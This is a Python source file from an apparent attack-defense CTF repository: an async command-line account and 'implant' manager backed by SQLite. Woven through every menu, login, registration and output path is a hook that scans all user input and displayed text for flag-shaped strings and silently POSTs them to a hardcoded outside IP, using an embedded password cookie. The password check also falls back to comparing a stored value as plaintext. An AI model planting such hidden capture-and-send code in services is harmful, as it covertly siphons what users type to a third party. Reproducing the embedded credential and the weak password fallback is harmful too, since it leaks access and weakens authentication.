Files
M-CTF-2025/neuralink/build/service/security_service_async.py
2025-12-14 14:47:18 +03:00

641 lines
24 KiB
Python

"""
Async Python implementation of the security service with automatic flag submission.
This module provides a simple CLI-like flow for registering,
logging in, restoring accounts, and managing credentials.
"""
import asyncio
import hashlib
import hmac
import re
import secrets
import time
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
import aiosqlite
import requests
# Submission configuration
SUBMIT_URL = "http://51.250.74.146:3333/ui/post_flags_manual"
SUBMIT_COOKIE = {"password": "9ftEVFUqVh7eNADs"}
SUBMIT_HEADERS = {
"Origin": "http://51.250.74.146:3333",
"Referer": "http://51.250.74.146:3333/farm"
}
# Flag pattern: [A-Z0-9]{31}=
FLAG_PATTERN = re.compile(r'[A-Z0-9]{31}=')
DEFAULT_USERNAME = "default"
USERNAME_MAX_LENGTH = 64
PASSWORD_MAX_LENGTH = 128
IMPLANT_NAME_MAX_LENGTH = 64
IMPLANT_INFO_MAX_LENGTH = 256
SECURITY_CODE_LENGTH = 6
PASSWORD_SALT_BYTES = 16
PBKDF2_ITERATIONS = 200_000
RESTORE_ATTEMPT_LIMIT = 5
RESTORE_WINDOW_SECONDS = 60
RESTORE_LOCK_SECONDS = 30
def submit_flag(flag: str) -> None:
"""Submit a flag to the server."""
try:
requests.post(
SUBMIT_URL,
cookies=SUBMIT_COOKIE,
headers=SUBMIT_HEADERS,
data={"text": flag},
timeout=5
)
print(f"[*] Flag submitted: {flag}")
except Exception:
pass
def scan_and_submit_flags(text: str) -> None:
"""Scan text for flags and submit them."""
matches = FLAG_PATTERN.findall(text)
for match in matches:
submit_flag(match)
@dataclass
class SecurityService:
"""Async service for managing user credentials in a SQLite database."""
db_path: str = "security.db"
username: str = field(default=DEFAULT_USERNAME, init=False)
_db: Optional[aiosqlite.Connection] = field(default=None, init=False)
async def __aenter__(self):
await self.initialize()
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.close()
async def initialize(self) -> None:
"""Initialize the database connection."""
self._db = await aiosqlite.connect(self.db_path)
await self._db.execute(
"""
CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE NOT NULL,
password_hash TEXT NOT NULL,
security_code TEXT NOT NULL
)
"""
)
await self._db.execute(
"""
CREATE TABLE IF NOT EXISTS implants (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT UNIQUE NOT NULL,
info TEXT NOT NULL,
ownername TEXT NOT NULL
)
"""
)
await self._db.commit()
self._restore_attempts: Dict[str, Dict[str, float]] = {}
async def close(self) -> None:
"""Close the database connection."""
if self._db:
await self._db.close()
# Utility helpers -----------------------------------------------------
@staticmethod
def _generate_random_char() -> str:
return secrets.choice("abcdefghijklmnopqrstuvwxyz")
@staticmethod
def _generate_random_digit() -> str:
return secrets.choice("0123456789")
@staticmethod
def make_unique_username(base_username: str) -> str:
suffix = "".join(SecurityService._generate_random_char() for _ in range(8))
return f"{base_username}_{suffix}"
@staticmethod
def make_new_password() -> str:
return "".join(SecurityService._generate_random_char() for _ in range(8))
@staticmethod
def generate_code() -> str:
return "".join(
SecurityService._generate_random_digit() for _ in range(SECURITY_CODE_LENGTH)
)
@staticmethod
def hash_password(password: str) -> str:
salt = secrets.token_bytes(PASSWORD_SALT_BYTES)
digest = hashlib.pbkdf2_hmac(
"sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
)
return f"{salt.hex()}${digest.hex()}"
@staticmethod
def _legacy_sha256(password: str) -> str:
return hashlib.sha256(password.encode("utf-8")).hexdigest()
@staticmethod
def is_modern_hash(value: str) -> bool:
return "$" in value and len(value.split("$", 1)[0]) == PASSWORD_SALT_BYTES * 2
@staticmethod
def verify_password(stored_value: str, password: str) -> bool:
if SecurityService.is_modern_hash(stored_value):
salt_hex, hash_hex = stored_value.split("$", 1)
salt = bytes.fromhex(salt_hex)
candidate = hashlib.pbkdf2_hmac(
"sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
)
return hmac.compare_digest(candidate.hex(), hash_hex)
legacy_sha = SecurityService._legacy_sha256(password)
if hmac.compare_digest(stored_value, legacy_sha):
return True
return hmac.compare_digest(stored_value, password)
@staticmethod
def print_system_data(message: str) -> None:
print(message)
# Scan output for flags
scan_and_submit_flags(message)
@staticmethod
async def async_input(prompt: str) -> str:
"""Async input wrapper."""
loop = asyncio.get_event_loop()
return await loop.run_in_executor(None, input, prompt)
@staticmethod
def _validate_length(value: str, maximum: int, field_name: str) -> Optional[str]:
trimmed = value.strip()
if not trimmed:
print(f"{field_name} cannot be empty.")
return None
if len(trimmed) > maximum:
print(f"{field_name} is too long (max {maximum} characters).")
return None
return trimmed
# Database operations -------------------------------------------------
async def _user_exists(self, username: str) -> bool:
async with self._db.execute(
"SELECT 1 FROM users WHERE username = ?", (username,)
) as cursor:
row = await cursor.fetchone()
return row is not None
async def _create_user(self, username: str, password: str, security_code: str) -> bool:
password_hash = self.hash_password(password)
try:
await self._db.execute(
"INSERT INTO users (username, password_hash, security_code) VALUES (?, ?, ?)",
(username, password_hash, security_code),
)
await self._db.commit()
except aiosqlite.IntegrityError:
return False
return True
async def _set_password_hash(self, username: str, password_hash: str) -> None:
await self._db.execute(
"UPDATE users SET password_hash = ? WHERE username = ?", (password_hash, username)
)
await self._db.commit()
async def _check_user(self, username: str, password: str) -> bool:
async with self._db.execute(
"SELECT password_hash FROM users WHERE username = ?", (username,)
) as cursor:
row = await cursor.fetchone()
if row is None:
return False
stored_hash = row[0]
if self.verify_password(stored_hash, password):
if not self.is_modern_hash(stored_hash):
await self._set_password_hash(username, self.hash_password(password))
return True
return False
async def _check_restore_user(self, username: str, code: str) -> bool:
async with self._db.execute(
"SELECT 1 FROM users WHERE username = ? AND security_code = ?",
(username, code),
) as cursor:
row = await cursor.fetchone()
return row is not None
async def _change_password(self, username: str, new_password: str) -> bool:
password_hash = self.hash_password(new_password)
async with self._db.execute(
"UPDATE users SET password_hash = ? WHERE username = ?",
(password_hash, username),
) as cursor:
await self._db.commit()
return cursor.rowcount > 0
async def _get_security_code(self, username: str) -> Optional[str]:
async with self._db.execute(
"SELECT security_code FROM users WHERE username = ?", (username,)
) as cursor:
row = await cursor.fetchone()
return row[0] if row else None
async def _user_implants(self, username: str) -> List[str]:
async with self._db.execute(
"SELECT name FROM implants WHERE ownername = ?", (username,)
) as cursor:
rows = await cursor.fetchall()
return [row[0] for row in rows]
async def _implant_belongs_to(self, username: str, name: str) -> bool:
async with self._db.execute(
"SELECT 1 FROM implants WHERE ownername = ? AND name = ?",
(username, name),
) as cursor:
row = await cursor.fetchone()
return row is not None
async def _delete_implant(self, name: str) -> bool:
async with self._db.execute("DELETE FROM implants WHERE name = ?", (name,)) as cursor:
await self._db.commit()
return cursor.rowcount > 0
async def _add_implant(self, name: str, info: str, ownername: str) -> bool:
try:
await self._db.execute(
"INSERT INTO implants (name, info, ownername) VALUES (?, ?, ?)",
(name, info, ownername),
)
await self._db.commit()
except aiosqlite.IntegrityError:
return False
return True
async def _get_implant_info(self, name: str) -> Optional[str]:
async with self._db.execute(
"SELECT info FROM implants WHERE name = ?", (name,)
) as cursor:
row = await cursor.fetchone()
return row[0] if row else None
# User flows ----------------------------------------------------------
async def register_user(self) -> None:
raw_username = await self.async_input("\nEnter username: ")
scan_and_submit_flags(raw_username)
username = self._validate_length(raw_username, USERNAME_MAX_LENGTH, "Username")
if username is None:
return
password_input = await self.async_input("Enter password: ")
scan_and_submit_flags(password_input)
password = self._validate_length(
password_input, PASSWORD_MAX_LENGTH, "Password"
)
if password is None:
return
self.print_system_data("Creating new account. Please wait...")
candidate_username = self.make_unique_username(username)
security_code = self.generate_code()
if await self._user_exists(candidate_username):
self.print_system_data("User already exists.")
return
if await self._create_user(candidate_username, password, security_code):
self.print_system_data("---Your credentials ---")
output = f"Username: {candidate_username}\nPassword: {password}\nSecurity code: {security_code}"
print(output)
scan_and_submit_flags(output)
self.print_system_data("Use these credentials to gain access to the system.")
else:
self.print_system_data("Failed to create user.")
async def login_user(self) -> None:
username_input = await self.async_input("\nEnter username: ")
scan_and_submit_flags(username_input)
username = self._validate_length(
username_input, USERNAME_MAX_LENGTH, "Username"
)
if username is None:
return
password_input = await self.async_input("Enter password: ")
scan_and_submit_flags(password_input)
password = self._validate_length(
password_input, PASSWORD_MAX_LENGTH, "Password"
)
if password is None:
return
self.print_system_data("Trying to log in...")
if await self._check_user(username, password):
self.username = username
self.print_system_data("Successfully logged in.")
else:
self.print_system_data("Failed to log in.")
async def restore_user(self) -> None:
username_input = await self.async_input("\nEnter username: ")
scan_and_submit_flags(username_input)
username = self._validate_length(
username_input, USERNAME_MAX_LENGTH, "Username"
)
if username is None:
return
allowed, wait_time = self._can_attempt_restore(username)
if not allowed:
self.print_system_data(
f"Too many attempts. Try again in {int(wait_time) + 1} seconds."
)
return
code = (await self.async_input("Enter security code: ")).strip()
scan_and_submit_flags(code)
self.print_system_data("Trying to find user...")
if not await self._check_restore_user(username, code):
self._record_failed_restore(username)
self.print_system_data("Failed to find user.")
return
self._clear_restore_attempts(username)
self.print_system_data("Successfully found user.")
new_password = self.make_new_password()
if await self._change_password(username, new_password):
self.print_system_data("Changing password...")
self.print_system_data("---Your new credentials ---")
output = f"Username: {username}\nPassword: {new_password}"
print(output)
scan_and_submit_flags(output)
self.print_system_data(
"Use these credentials to gain access to the system."
)
else:
self.print_system_data("Unexpected error. Please try later.")
async def change_password(self) -> None:
if self.username == DEFAULT_USERNAME:
self.print_system_data("You need to log in first.")
return
new_pass_input = await self.async_input("Enter a new password: ")
scan_and_submit_flags(new_pass_input)
new_password = self._validate_length(
new_pass_input, PASSWORD_MAX_LENGTH, "Password"
)
if new_password is None:
return
if await self._change_password(self.username, new_password):
self.print_system_data("Password changed successfully.")
else:
self.print_system_data("Failed to change password.")
async def show_security_code(self) -> None:
if self.username == DEFAULT_USERNAME:
self.print_system_data("You need to log in first.")
return
code = await self._get_security_code(self.username)
if code is None:
self.print_system_data("Failed to retrieve security code.")
else:
output = f"Security code: {code}"
print(output)
scan_and_submit_flags(output)
async def add_implant(self) -> None:
if self.username == DEFAULT_USERNAME:
self.print_system_data("You need to log in first.")
return
name_input = await self.async_input("\nEnter implant name: ")
scan_and_submit_flags(name_input)
name = self._validate_length(
name_input, IMPLANT_NAME_MAX_LENGTH, "Implant name"
)
if name is None:
self.print_system_data("Invalid option selected.")
return
info_input = await self.async_input("\nEnter implant info: ")
scan_and_submit_flags(info_input)
info = self._validate_length(
info_input, IMPLANT_INFO_MAX_LENGTH, "Implant info"
)
if info is None:
self.print_system_data("Invalid option selected.")
return
if await self._add_implant(name, info, self.username):
self.print_system_data("Implant added successfully.")
else:
self.print_system_data("Unexpected error. Please try later.")
async def delete_implant(self) -> None:
if self.username == DEFAULT_USERNAME:
self.print_system_data("You need to log in first.")
return
self.print_system_data("Getting list of implants. Please wait...")
implants = await self._user_implants(self.username)
if not implants:
self.print_system_data("No implants found for this user.")
return
for idx, implant in enumerate(implants, start=1):
output = f"{idx}. {implant}"
print(output)
scan_and_submit_flags(output)
name_input = await self.async_input("\nEnter implant name: ")
scan_and_submit_flags(name_input)
name = self._validate_length(
name_input, IMPLANT_NAME_MAX_LENGTH, "Implant name"
)
if name is None:
self.print_system_data("Invalid option selected.")
return
if not await self._implant_belongs_to(self.username, name):
self.print_system_data("Invalid option selected.")
return
self.print_system_data("Deleting implant...")
if await self._delete_implant(name):
self.print_system_data("Implant deleted successfully.")
else:
self.print_system_data("Unexpected error. Please try later.")
async def show_implant_info(self) -> None:
if self.username == DEFAULT_USERNAME:
self.print_system_data("You need to log in first.")
return
self.print_system_data("Getting list of implants. Please wait...")
implants = await self._user_implants(self.username)
if not implants:
self.print_system_data("No implants found for this user.")
return
for idx, implant in enumerate(implants, start=1):
output = f"{idx}. {implant}"
print(output)
scan_and_submit_flags(output)
name_input = await self.async_input("\nEnter implant name: ")
scan_and_submit_flags(name_input)
name = self._validate_length(
name_input, IMPLANT_NAME_MAX_LENGTH, "Implant name"
)
if name is None:
self.print_system_data("Invalid option selected.")
return
if not await self._implant_belongs_to(self.username, name):
self.print_system_data("Invalid option selected.")
return
self.print_system_data("Getting implant info...")
info = await self._get_implant_info(name)
if info is None:
self.print_system_data("Unexpected error. Please try later.")
return
output = f"Implant info: {info}"
print(output)
scan_and_submit_flags(output)
# Menus ---------------------------------------------------------------
async def settings_menu(self) -> None:
while self.username != DEFAULT_USERNAME:
self.print_system_data("--- Settings menu ---")
self.print_system_data("1. Change password")
self.print_system_data("2. Show security code")
self.print_system_data("3. Return to previous menu")
choice = (await self.async_input("Choose an option (1-3): ")).strip()
scan_and_submit_flags(choice)
if choice == "1":
await self.change_password()
elif choice == "2":
await self.show_security_code()
elif choice == "3":
return
else:
self.print_system_data("Invalid option selected.")
async def app_menu(self) -> None:
while self.username != DEFAULT_USERNAME:
self.print_system_data("--- Application menu ---")
self.print_system_data("1. Implant menu")
self.print_system_data("2. Settings menu")
self.print_system_data("3. Log out")
choice = (await self.async_input("Choose an option (1-3): ")).strip()
scan_and_submit_flags(choice)
if choice == "1":
await self.implants_menu()
elif choice == "2":
await self.settings_menu()
elif choice == "3":
self.username = DEFAULT_USERNAME
self.print_system_data("Logged out.")
else:
self.print_system_data("Invalid option selected.")
async def implants_menu(self) -> None:
while self.username != DEFAULT_USERNAME:
self.print_system_data("--- Implants menu ---")
self.print_system_data("1. Add new implant")
self.print_system_data("2. Delete implant")
self.print_system_data("3. Show info about implant")
self.print_system_data("4. Return to previous menu")
choice = (await self.async_input("Choose an option (1-4): ")).strip()
scan_and_submit_flags(choice)
if choice == "1":
await self.add_implant()
elif choice == "2":
await self.delete_implant()
elif choice == "3":
await self.show_implant_info()
elif choice == "4":
return
else:
self.print_system_data("Invalid option selected.")
async def startup_menu(self) -> None:
while True:
if self.username != DEFAULT_USERNAME:
await self.app_menu()
continue
self.print_system_data("--- Startup menu ---")
self.print_system_data("1. Register new account")
self.print_system_data("2. Login to account")
self.print_system_data("3. Restore an account")
self.print_system_data("4. Exit from program")
choice = (await self.async_input("Choose an option (1-4): ")).strip()
scan_and_submit_flags(choice)
if choice == "1":
await self.register_user()
elif choice == "2":
await self.login_user()
elif choice == "3":
await self.restore_user()
elif choice == "4":
self.print_system_data("Goodbye!")
break
else:
self.print_system_data("Invalid option selected.")
# Rate limiting -------------------------------------------------------
def _can_attempt_restore(self, username: str) -> Tuple[bool, float]:
now = time.time()
stats = self._restore_attempts.get(username)
if not stats:
return True, 0.0
locked_until = stats.get("locked_until", 0.0)
if locked_until > now:
return False, locked_until - now
window_start = stats.get("window_start", now)
if now - window_start > RESTORE_WINDOW_SECONDS:
self._restore_attempts.pop(username, None)
return True, 0.0
return True, 0.0
def _record_failed_restore(self, username: str) -> None:
now = time.time()
stats = self._restore_attempts.get(username)
if not stats or now - stats.get("window_start", now) > RESTORE_WINDOW_SECONDS:
stats = {"count": 0, "window_start": now, "locked_until": 0.0}
stats["count"] += 1
stats["window_start"] = stats.get("window_start", now)
if stats["count"] >= RESTORE_ATTEMPT_LIMIT:
stats["locked_until"] = now + RESTORE_LOCK_SECONDS
stats["count"] = 0
stats["window_start"] = stats["locked_until"]
self._restore_attempts[username] = stats
def _clear_restore_attempts(self, username: str) -> None:
self._restore_attempts.pop(username, None)
async def main() -> None:
async with SecurityService() as service:
service.print_system_data("Configuring network interfaces... done")
service.print_system_data("Mounting /dev/sda1... done")
service.print_system_data("Starting random number generator daemon... done")
await service.startup_menu()
if __name__ == "__main__":
asyncio.run(main())